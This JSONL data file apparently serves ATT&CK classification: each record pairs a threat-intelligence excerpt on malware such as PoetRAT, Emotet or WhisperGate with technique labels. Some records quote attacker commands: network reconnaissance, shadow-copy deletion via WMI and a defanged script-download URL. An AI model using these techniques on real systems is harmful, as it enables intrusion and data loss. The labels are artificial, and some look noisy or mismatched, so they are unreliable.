{"text1":"Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. Start routine The communication between the scripts is done via a file called \"Abibliophobia23\" Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called \"System32.Log. Tre.py\": A script used to create the file with the files\/directories tree","labels":"['T1105']"}
{"text1":"This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document \u2014 \u0441\u0443\u0434\u0430\u043b\u0433\u0430\u0430.doc (research.doc) \u2014 was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China","labels":"['T1203']"}
{"text1":"Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim\u2019s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones","labels":"['T1021.002', 'T1018']"}
{"text1":"The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators","labels":"['T1553.002']"}
{"text1":"TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file","labels":"['T1566.002']"}
{"text1":"Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim\u2019s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker\u2019s server, not in a file on the victim\u2019s endpoint. 7) Finally, TrickBot\u2019s financial module replaces the original response that would normally come from the bank with the C2\u2019s response, and the injected page is displayed on the victim\u2019s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot\u2019s Server Side Web-Injects \u2014 Top Level Flow. Figure 5: TrickBot and Dyre both use \u201csourcelink\u201d and \u201csourcequery\u201d for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters","labels":"['T1185']"}
{"text1":"No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks","labels":"['T1036.005', 'T1204.002']"}
{"text1":"The Rundll32Call exported function begins by creating a named event named \u2018RunOnce\u2019. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below","labels":"['T1140']"}
{"text1":"The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp:\/\/micrrosoft[.]net\/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user\u2019s consent via the following dialog box in Figure 3","labels":"['T1547.001', 'T1059.001', 'T1059.001']"}
{"text1":"the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6","labels":"['T1547.012']"}
{"text1":"More specifically, Ramsay looks for any of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim\u2019s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted","labels":"['T1082']"}
{"text1":"Then, it drops C:\\Users\\Public\\x.vbs. Then it drops, C:\\Users\\Public\\Natso.bat. Then, it executes `Natso.bat`, which is a \"fileless\" UAC bypass found by James Forshaw. If C:\\Windows\\Finex still doesn't exist (which means the UAC bypass failed), it will update the Nasto.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\\Windows\\Finex` was successfully created. After that, the DLL deletes the dropped file and exits","labels":"['T1070.004']"}
{"text1":"To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable","labels":"['T1574.007']"}
{"text1":"As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos","labels":"['T1573.001', 'T1059.004']"}
{"text1":"Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them","labels":"['T1584.004']"}
{"text1":"Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* - Change the time of a file as specified by the control server","labels":"['T1070.006']"}
{"text1":"Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server","labels":"['T1059.004']"}
{"text1":"Finally, the command: system_profiler SPHardwareDataType 2>\/dev\/null || awk \u2018\/Boot ROM Version\/ {split($0, line, \u201c:\u201d);printf(\u201c%s\u201d, line[2]);} checks if the machine is one of the following: \u201cMBP\u201d, \u201cMBA\u201d, \u201cMB\u201d, \u201cMM\u201d, \u201cIM\u201d, \u201cMP\u201d and \u201cXS\u201d. These codes represent the model of the system. For instance, \u201cMBP\u201d stands for MacBook Pro, \u201cMBA\u201d stands for MacBook Air and so on","labels":"['T1497.001']"}
{"text1":"Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap","labels":"['T1140', 'T1574.013', 'T1620']"}
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell","labels":"['T1059.003']"}
{"text1":"WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware","labels":"['T1547.001']"}
{"text1":"This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP\/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity","labels":"['T1205']"}
{"text1":"The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors\u2019 job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7\/9\/2020","labels":"['T1584.001']"}
{"text1":"More interesting however is it that it also contains support for windows execution via smb shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote windows shares and then execute as a service","labels":"['T1021.002']"}
{"text1":"One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader\u2019s version","labels":"['T1082']"}
{"text1":"It drops ransom notes at various folders in the system and opens one after it has encrypted the data and documents of the victim. As with usual ransomware, it does this to extort money from the victim in exchange for the decryption of their files","labels":"['T1486']"}
{"text1":"Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function \u2013 this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year","labels":"['T1027']"}
{"text1":"Establish persistence for itself on the endpoint - Establish persistence of another component of the malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server","labels":"['T1070.004', 'T1547.001']"}
{"text1":"Regularly, the service checks if a user is logged, by checking if Explorer is running. Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe","labels":"['T1057']"}
{"text1":"The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing","labels":"['T1124']"}
{"text1":"Passgrabber module \u2013 collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms","labels":"['T1555.003']"}
{"text1":"The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1547.004']"}
{"text1":"The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we\u2019ve seen communicate via HTTPS and WebDav with the same server \u201ccloudme.com\u201d, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Link\u00f6ping, Sweden","labels":"['T1102']"}
{"text1":"These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered\u2014one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22","labels":"['T1132.001', 'T1574.002']"}
{"text1":"Gather all network configuration information and record to a file on disk in a folder created by the implant using the command:\u00a0cmd.exe \/c ipconfig\/all >>\"%s\" & arp -a >>\"%s\"\u00a0where %s = <file_path","labels":"['T1016']"}
{"text1":"The overwritten code reads the ransom note string inside the MBR and sets it to appear on the display","labels":"['T1542.003']"}
{"text1":"Consent - Details - [#IABV2SETTINGS#] - About This website uses cookies . We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you\u2019ve provided to them or that they\u2019ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest\u00a0[x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email. Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit\u2019s shikata_ga_nai encoder \u2013 although it\u2019s available for everyone and couldn\u2019t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u00b4t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board","labels":"['T1574.002']"}
{"text1":"Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API\u2019s return values is modified by a system monitoring solution, like a sandbox","labels":"['T1124']"}
{"text1":"Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed","labels":"['T1059.003', 'T1070.004']"}
{"text1":"CTU analysis of one of GOLD KINGSWOOD's campaign using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script","labels":"['T1553.002']"}
{"text1":"There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others","labels":"['T1027']"}
{"text1":"Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another","labels":"['T1583.001']"}
{"text1":"After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3","labels":"['T1482']"}
{"text1":"Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files","labels":"['T1204.002']"}
{"text1":"In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems","labels":"['T1561.002']"}
{"text1":"This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies","labels":"['T1585.002']"}
{"text1":"This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon\u2019s operators","labels":"['T1027.001', 'T1053.005']"}
{"text1":"The attackers configured multiple C2 servers for various stages, reusing several scripts we\u2019ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns","labels":"['T1584.004']"}
{"text1":"APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement","labels":"['T1505.003']"}
{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information","labels":"['T1036.005']"}
{"text1":"Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives","labels":"['T1080']"}
{"text1":"These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware","labels":"['T1016', 'T1082', 'T1007']"}
{"text1":"1) Moving the (malicious) application into the \/Users\/user\/Library\/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest","labels":"['T1036']"}
{"text1":"TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware \u2014 threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations","labels":"['T1566.001']"}
{"text1":"The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun The subsystem searches for a LNK file in the target directory, changes the path to \u201ccmd.exe\u201d and the description to \u2018 \/q \/c start \u201c\u201d \u201c%s\u201d && start \u201c\u201d \u201c%s\u201d \u2018 TaskScheduler20Autorun The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger StartupAutorun The subsystem creates a LNK file in %STARTUP% ScreenSaverAutorun The subsystem installs as a current screensaver with a hidden window HiddenTaskAutorun The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory ShellAutorun Winlogon registry [HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon] Shell=\u201dexplorer.exe","labels":"['T1547.001', 'T1547.009']"}
{"text1":"Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine. Execute the command","labels":"['T1059.003']"}
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move latterly and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information","labels":"['T1003']"}
{"text1":"In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system","labels":"['T1105']"}
{"text1":"The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download\/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2","labels":"['T1010']"}
{"text1":"NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails","labels":"['T1204.002', 'T1140']"}
{"text1":"In order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script","labels":"['T1016']"}
{"text1":"One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros","labels":"['T1566.001', 'T1027', 'T1204.002', 'T1221']"}
{"text1":"First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration","labels":"['T1573.001', 'T1546.015']"}
{"text1":"Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include \u201cGC\u201d (Global Catalog) and \u201cE3514235-4B06-11D1-AB04-00C04FC2DCD2\u201d (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC","labels":"['T1207']"}
{"text1":"The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another\u2019s process token just for the execution of a command","labels":"['T1134.002']"}
{"text1":"Then, it reads the dropped file with the .db3 extension, which contains position-independent code, and uses CreateThread to execute its content","labels":"['T1574.002']"}
{"text1":"The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan\u2019s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver","labels":"['T1105']"}
{"text1":"Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports","labels":"['T1071.001', 'T1095']"}
{"text1":"Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process","labels":"['T1569.002']"}
{"text1":"DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id","labels":"['T1047', 'T1490', 'T1490', 'T1490', 'T1047', 'T1047']"}
{"text1":"In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the \"net start %s\" argument (without quotes), where \"%s\" is the service name","labels":"['T1543.003']"}
{"text1":"The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration","labels":"['T1049']"}
{"text1":"FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue","labels":"['T1203']"}
{"text1":"In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload","labels":"['T1059.001']"}
{"text1":"One of the file path name combinations observed was \u2018C:\\ProgramData\\Dacr\\macrse.exe\u2019, also configured in a Crimson \u201cMain Client\u201d sample and used for saving the payload received from the C2 when invoking the usbwrm command","labels":"['T1105']"}
{"text1":"In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence","labels":"['T1082']"}
{"text1":"Command Number \u2013 a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID \u2013 can be one of the following commands: 101 \u2013 Shell Command: execute the Shell command attached in the {Arg1} argument. 102 \u2013 Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 \u2013 Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument. 101 \u2013 Shell Command: execute the Shell command attached in the {Arg1} argument. 102 \u2013 Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 \u2013 Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument","labels":"['T1059.003']"}
{"text1":"Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from Linux-based operating system. When the Linux binary \u201cwinexe\u201d is run against a Windows server, the winexesvc.exe executable is created and installed as a service","labels":"['T1569.002']"}
{"text1":"CertPKIProvider.dll, tracked by Microsoft as \u201cVaporRage\u201d can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL","labels":"['T1105']"}
{"text1":"On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads","labels":"['T1583.006', 'T1102', 'T1608.001']"}
{"text1":"Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools","labels":"['T1059.001']"}
{"text1":"Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites\/forums such as Github and Microsoft's TechNet portal","labels":"['T1547.001', 'T1547.009']"}
{"text1":"After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration","labels":"['T1560.001']"}
{"text1":"Distributing the ransomware using spear-phishing and weaponized documents - Bat-files downloading payloads from Pastebin and inject them into a process on the operating system - Compromising RDP and usage of script files and password cracking tools to distribute over the victim\u2019s network - Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware","labels":"['T1055']"}
{"text1":"Perhaps the most interesting part here is the unusual command and control mechanism based on TCP\/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity","labels":"['T1095']"}
{"text1":"The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report","labels":"['T1204.001']"}
{"text1":"Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service\u2014a reverse proxy software that creates secure tunnels\u2014to collect the stolen data","labels":"['T1572']"}
{"text1":"The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server","labels":"['T1059.001']"}
